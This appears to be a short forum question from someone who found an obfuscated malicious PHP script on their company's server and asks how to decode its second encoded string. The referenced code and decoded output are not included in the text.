Decoding PHP obfuscated payload

Recently I found a malicious PHP payload on my company's server. The code seems to be encoded into two strings claster and x64. The claster string decodes to the following

I was unable to decode the x64 string. Using the same decoding method, I get garbage. If it is some sort of byte-code being added to the stack how do I decompile it into readable assembly? The whole script is as follows.
